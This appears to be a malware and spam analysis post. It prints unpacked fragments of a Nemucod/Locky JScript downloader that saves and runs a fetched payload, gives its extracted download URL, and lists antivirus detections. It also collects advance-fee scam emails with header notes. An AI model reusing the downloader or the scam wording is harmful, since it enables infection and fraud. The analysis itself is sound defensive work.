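# Added example, not code from the original post or the sample: a Python
# re-implementation of the eval(function(p,a,c,k,e,r){...}) "packer" stage that
# this script uses several times.  The stage replaces every \w+ word of the
# payload p with dictionary entry k[index], where the word is the index spelled
# in radix a (a=62 -> 0-9a-zA-Z, a<=36 -> toString(a), e=String -> decimal).
# One decoder with the radix as a parameter therefore unpacks every instance,
# and nothing from the sample is executed.
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def encode_index(n, radix):
    """Spell n exactly as the packer's e(c) does: radix-a digits, where a
    digit above 35 is an upper-case letter (String.fromCharCode(d + 29))."""
    out = ""
    while True:
        n, d = divmod(n, radix)
        out = DIGITS[d] + out
        if n == 0:
            return out


def unpack(p, a, c, k):
    """Undo one packer stage.  p: packed payload, a: radix, c: word count,
    k: the dictionary list exactly as the JS builds it (empty entries allowed)."""
    table = {encode_index(i, a): k[i] for i in range(min(c, len(k))) if k[i]}
    # Words not in the table stay as they are, like k[c]||e(c) in the packer.
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)


# The two short packer stages above, copied with their dictionary post-processing
# (.replace('U','HpU') and .split('ZZ')) reproduced in Python.
SHELL_P = "0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());"
SHELL_K = "rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL".replace("U", "HpU", 1).split("|")

GATE_P = '1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}'
GATE_K = ("emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionally"
          "ZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ").split("ZZ")


def unpack_shell_stage():
    """The a=9, e=String stage that builds the WScript.Shell / XMLHTTP objects."""
    return unpack(SHELL_P, 9, 9, SHELL_K)


def unpack_gate_stage():
    """The a=18 stage guarded by thenDo that defines saloHood()."""
    return unpack(GATE_P, 18, 18, GATE_K)


if __name__ == "__main__":
    print(unpack_shell_stage())
    print(unpack_gate_stage())
```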

===================================
CONVERSION (UNPACKED)
===================================

if(NBHAYvL.status==200)
{
var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));
OkUvN[""+("installation","eastwards","expression","footage","green","winter","embody","yukon","o")+"pen"]();
MOmXidnhR="
}
Make sure that the handler has a unique ID, used to find/remove it later if ( !handler.guid )
{
handler.guid = jQuery.guid++;
";
OkUvN.type=0+3-2;
eibdpjiyakm="
}
Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) )
{
events = elemData.events =
{
};
}
if ( !( eventHandle = elemData.handle ) )
{
eventHandle = elemData.handle = function( e )
{
";
OkUvN["w"+"ri"+("sensitivity","lawlessness","reflects","treadmill","external","dissimulation","perversion","rusted","te")](NBHAYvL[""+("assorted","announce","compete","booth","libretto","definition","censor","R")+"es"+"pon"+boughts+("constructing","warren","recipient","electrified","suffered","chunk","listen","e")+"Bo"+"dy"]);
STOuIe=" Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined;
};
";
OkUvN[(titular+("grandee","womanish","benjamin","whole","wireless","rarely","logitech","evasively","o")+"Di"+"ti"+("geology","abyssinian","hodge","reservoir","acrimony","snowball","browser","on")).replace("D",boughts)]=0;
dJIemps=" Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem;
";
OkUvN["s"+("curative","deface","marker","remittance","residents","balance","permalink","av")+"eT"+"oF"+("snowball","movie","awestruck","savory","neuter","slight","pushed","ile")](francisco,2);
NBlaxcR="
}
Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ];
t = types.length;
while ( t-- )
{
tmp = rtypenamespace.exec( types[ t ] ) || [];
type = origType = tmp[ 1 ];
namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();
";
OkUvN.close();
HuIaJMUIgp=" There *must* be a type, no attaching namespace-only handlers if ( !type )
{
continue;
";
XtpJu[BHpUk.shift()](francisco,1,"UsjNuiXNlu"==="NMWYuV");
pgvvXzp=" Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false )
{
"
}


===================================
FINAL
===================================

} catch (rzupeJz) { };
kOWbigYady = " Init the event handler queue if we\"re the first if ( !( handlers = events[ type ] ) ) { handlers = events[ type ] = []; handlers.delegateCount = 0;";
}
saloHood();
NPQynFqCF = " handleObj is passed to all event handlers handleObj = jQuery.extend( { type: type, origType: origType, data: data, handler: handler, guid: handler.guid, selector: selector, needsContext: selector && jQuery.expr.match.needsContext.test( selector ), namespace: namespaces.join( \".\" ) }, handleObjIn );";


===================================
CONCLUSION :
===================================

URL EXTRACTED : lovesanimals.com/09y8hb7v6y7g
TECHNOLOGY : UNICODE,UNPACKER,JSCRIPT,BASE64

NON-COMPLIANCE DOCUMENT (Virus)

Attached is the non-compliance document.

All the best,
--



SCopieur VA9812357665355478.gz

Virus analysis :

SHA256 : 0235a1aded1737d8c89186b29a34610be835ff45f896091d6dcd6eb9a3152061
Filename : SCopieur VA9812357665355478.gz

ALYac : JS:Trojan.JS.Downloader.IQ
AVG : JS/Downloader.Agent
Ad-Aware : JS:Trojan.JS.Downloader.IQ
Arcabit : JS:Trojan.JS.Downloader.IQ
Avast : JS:Downloader-CZW [Trj]
Avira (no cloud) : JS/Dldr.Locky.98765
BitDefender : JS:Trojan.JS.Downloader.IQ
CAT-QuickHeal : JS.Locky.P
Cyren : JS/Locky.AC
DrWeb : JS.DownLoader.1397
ESET-NOD32 : JS/TrojanDownloader.Nemucod.WU
F-Prot : JS/Locky.AC
F-Secure : JS:Trojan.JS.Downloader.IQ
Fortinet : JS/Nemucod.WU!tr.dldr
GData : JS:Trojan.JS.Downloader.IQ
Ikarus : Trojan-Ransom.Script.Locky
Kaspersky : Trojan-Downloader.JS.Agent.kee
McAfee : JS/Nemucod.is
McAfee-GW-Edition : JS/Nemucod.is
eScan : JS:Trojan.JS.Downloader.IQ
Microsoft : TrojanDownloader:JS/Nemucod.EK
Rising : Downloader.Ransomware!8.625A-SOAAbihlG7H (Cloud)
Sophos : JS/Dldr-MD

Email analysis :

NOTE : lg46@valoritech.fr
NOTE : User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.7.0
NOTE : Received : from cmodem.201.140.226-163.wirenet.com.ar (unknown [201.140.226.163])

Godwin Emefiele

IMMEDIATE CONTRACT PAYMENT
CONTRACT #:MAV/NNPC/FGN/MIN/0015

From the records of outstanding contractors due for payment with the federal government of Nigeria, your name and company were discovered as next on the list of the outstanding contractors who have not received their payments. I wish to inform you that your payment is being processed and will be released to you as soon as you respond to this letter. Also note that from my records your outstanding contract payment is US$15.9 Million Dollars. Please re-confirm to me if this is in line with what you have in your records and also re-confirm to me the following.

1) Your full name.
2) Telephone and fax number; if possible include your mobile telephone number.
3) Company name, position and address.
4) Profession, age and marital status.

As soon as this information is received, your payment will be made to you in a certified bank draft from the central bank of Nigeria and a copy will be given to you to take to your bank for confirmation. Please get back to us with the below email address: godwinemefiele@writeme.com

Regards,

Mr. Godwin Emefiele.


Email analysis :

NOTE : godwin009@y28mail.com
NOTE : Received : from [185.56.137.14] by www.y28mail.com via HTTP;

GOD BLESS YOU

Hello, beloved in Christ,

I was able to contact you during a little browse in my spare moments on the Internet, following my searches, through which I found your expertise, which allows me to contact you in this way. I therefore chose you by the will of GOD and not by mere chance. My state of health having deteriorated, I am planning to donate to you my fortune of 2,500,000 € held at the Bank Of Africa Bénin (BOA-BENIN) in West Africa so that you can carry out humanitarian projects (help for vulnerable people such as: street children, orphans, the destitute and homeless, etc.). My heart is at peace, even though I am afflicted by an illness that has been wearing down my life for almost three years, for which I am currently under medical observation in London, England. According to the doctor, the blood clot that has lodged in the brain is at a very advanced stage, and so any surgical operation would be a failure in advance. I am afraid that the rest of my money will be wasted after my death. I have therefore decided to stop the treatment. Please contact me directly at my email: ginettebourgeois1948@gmail.com

GOD BLESS YOU
Waiting to hear from you

Kind regards

Ginette Bourgeois

Email analysis :

NOTE : ginettebourgeois1948@gmail.com
NOTE : june_june0822@zeus.eonet.ne.jp
NOTE : X-Originating-Ip : [::ffff:41.86.234.171]


NOTE : Mime-Version : 1.0
NOTE : X-Mailer : Zimbra Mailer (ZimbraWebClient - GC50 (Win)/0.0)
NOTE : Received : from mta02.eonet.ne.jp (mta02.eonet.ne.jp. [2001:ce8:0:603::48])
NOTE : Received : from mailmbsb1mc4.mozu.eo.k-opti.ad.jp (mbs07.eonet.ne.jp [60.56.6.205])


NOTE : by mailauthmsa11.mozu.eo.k-opti.ad.jp
NOTE : GOD BLESS YOU

Charlotte Gomgnimbou

Dear Friend,

I am Miss Charlotte Gomgnimbou.

A computer scientist with Central Bank Of Nigeria. I am 29 years old, just started work with Central bank of Nigeria. I came across your file which was marked X and your released disk painted RED, I took time to study it and found out that you have paid VIRTUALLY all fees and certificate but the fund has not been released to you.

The most annoying thing is that they cannot tell you the truth that on no account will they ever release the fund to you. Please this is like a Mafia setting in Nigeria; you may not understand it because you are not a Nigerian.
The only thing I will need to release this fund is a special HARD DISK we call it HD120 GIG. I will buy two of it, recopy your information, destroy the previous one, and punch the computer to reflect in your bank within 24 banking hours. I will clean up the tracer and destroy your file, after which I will run away from Nigeria to meet with you.

If you are interested, do get in touch with me immediately. You should send to me your convenient tel/fax numbers for easy communication and also re-confirm your banking details, so that there won't be any mistake.

Regards,
Miss Charlotte Gomgnimbou.

Email analysis :

NOTE : brasero@speedy.com.ar
NOTE : mrs.chaulotle@yahoo.fr
NOTE : client-ip=98.142.233.68;


NOTE : Received : from localhost (13k.terra.com [208.84.242.163])


NOTE : (authenticated user brasero!speedylm)
NOTE : by mail-smtp07-mia.tpn.terra.com (Postfix)

Larry John

Attention,

This is to inform you that I have registered your card valued $4.8 Million through courier company DHL, the registration code is: awb 33xzs. Kindly re-confirm your information to avoid wrong claim: your names, address, phone number and country. Write Dr. Larry John and also call him on: +229 68947039, drlarryjohn1@gmail.com

I have paid for the Insurance & Delivery fee. The only fee you have to pay is their Security fee of $100. Please indicate the registration Number and ask Him how to pay their Security fee of $100 so that you can pay it immediately.

Best Regards,

larryjohn

Email analysis :

NOTE : ronnie.dobbs123@gmail.com
NOTE : larryjohn@sfr.fr
NOTE : Received : from smtp2.tech.numericable.fr (smtp2.tech.numericable.fr. [82.216.111.38])


NOTE : Received : from mowmail-nc5.nc.sdv.fr (mowmail-nc5.tech.numericable.fr [82.216.111.105]) by smtp2.tech.numericable.fr (Postfix)


NOTE : Received : from [198.24.162.179] by webmail.numericable.fr with http webmail;

John Paul

ATTENTION: BENEFICIARY,

WE, THE MONEY GRAM REMITTING OFFICE, HEREBY WRITE TO INFORM YOU THAT WE HAVE ALREADY SENT YOUR FULL COMPENSATION PAYMENT OF $4.5M TO YOU THROUGH MONEY GRAM. YOU WILL BE RECEIVING 10.000.00USD PER DAY, AND WE HAVE SENT THE FIRST PAYMENT TO YOU. SO CONTACT OUR DIRECTOR MR. PATRICK NNADIS AND ASK HIM TO GIVE YOU THE MONEY GRAM PAYMENT INFORMATION SO THAT YOU CAN BE ABLE TO PICK UP YOUR FUNDS

THROUGH MONEY GRAM WITHOUT ANY PROBLEM.

CONTACT HIM WITH THE BELOW INFORMATION.

(moneygram11_@hotmail.com)
PHONE NUMBER (+22968574832)

AND CONTACT HIM WITH YOUR FULL INFORMATION.

Your name............
country.... ..........
phone ...........
address...............
city..........
age..................
sex..................

CALL OR EMAIL HIM NOW SO THAT HE CAN PROVIDE THE MONEY GRAM INFORMATION TO YOU AS SOON AS YOU CAN.

Thanks and Remain Blessed John Paul.
From Money Gramm.
YOUR FIRST PAYMENT THROUGH MONEY GRAM.

Email analysis :

NOTE : www.@wine.ocn.ne.jp
NOTE : moneygram11_@hotmail.com
NOTE : X-Originating-Ip : [41.138.89.195]

U.S HOMELAND SECURITY

Tele:+1 (952)388-5407 text messages only

I am Mr. Jeh Charles Johnson, the secretary of the U.S. Department of Homeland Security, Washington DC. A consignment box which contains fiscal cash of about $4.5m was brought to our office with your name as the beneficiary, so kindly reconfirm your full address, full name, phone number, and nearest airport so that you will come and claim it at our Head Office in Washington DC or we can send it to your designated address. I await your urgent and positive response. You can reach me on this email as well: jehcharlesjohnson911@gmail.com

Email analysis :

NOTE : suntaxi.@alto.ocn.ne.jp
NOTE : jehcharlesjohnson911@gmail.com
NOTE : X-Originating-Ip : [41.86.234.171]

donation

My wife and I have decided to share with you a piece of our life-changing fund from the lotto we won. EMAIL TO mrs.habrizah@hotmail.com

Email analysis :

NOTE : contact020@davidsfamly.com
NOTE : mrs.habrizah@hotmail.com
NOTE : X-Originating-Ip : [169.159.113.92]

GUARANTEED LOAN OFFER, APPLY NOW:

STEWART J. FORD COMPANY has money to lend to interested individuals, investors, companies, etc. from any country, for any purpose, with any form of credit.

Are you in desperate need of funds?
Do you want a house or a car but do not have the finances to acquire it?
Are you in need of funds for your real estate business, the purchase of property or the establishment of a project?
Have you been refused by other lenders or banks?
Are you in need of funds to pay your bills or for your children's education?
Are you in need of financial assistance for a start-up or expansion or for other purposes?

STEWART J FORD Lending company is giving you the opportunity to realize your dream. We help solve your financial problem within a short period. If you are interested in a loan, please contact us via the e-mail address below for your loan application.

stewartfordj@gmail.com

Email analysis :

NOTE : bonifaciojoseph1@gmail.com
NOTE : stewartfordj@gmail.com